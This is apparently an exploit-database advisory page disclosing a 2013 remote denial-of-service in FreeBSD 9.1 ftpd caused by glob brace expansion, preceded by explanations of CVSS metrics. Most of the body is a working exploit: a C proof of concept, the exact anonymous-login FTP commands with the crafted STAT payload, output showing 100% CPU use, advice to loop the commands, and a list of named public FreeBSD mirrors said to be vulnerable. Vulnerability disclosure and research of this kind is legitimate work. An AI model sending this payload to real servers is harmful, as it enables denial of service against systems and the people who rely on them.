The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...
--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous', sending 'STAT' command with special wildchar, enought to create ftpd process with 100% CPU usage.
Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>
int main(){
glob_t globbuf;
char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---
--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
Result of attack:
ftp 13034 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13035 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13036 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13046 0.0 0.4 10416 1952 ?? R 10:48PM 0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13047 0.0 0.4 10416 1960 ?? R 10:48PM 0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root 13219 0.0 0.3 10032 1424 ?? R 10:52PM 0:00.00 /usr/libexec/ftpd -dDA
root 13225 0.0 0.3 10032 1428 ?? R 10:52PM 0:00.00 /usr/libexec/ftpd -dDA
root 13409 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 /usr/libexec/ftpd -dDA
root 13410 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 /usr/libexec/ftpd -dDA
...
=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
=>Result:
@ps:
ftp 1336 100.0 0.5 10416 2360 ?? R 11:15PM 600:39.95 ftpd: 127.0.0.1: anonymous/[email protected]: \r\n (ftpd)$
@top:
1336 root 1 103 0 10416K 2360K RUN 600:53 100.00% ftpd
one request over 600m (~10h) execution time and 100% CPU usage. This issue allow to create N ftpd processes with 100% CPU usage.
Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2
The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
freeglob = 1;
if (glob(whichf, flags, 0, &gl)) {
---
but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU resource exhaustion. ;]
Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723
only FreeBSD and GNU glibc are affected
--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233
--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve problem with security ;)
--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632
Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418
More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399
The regcomp implementation in the GNU C Library allows attackers to cause a denial of service proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279
--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum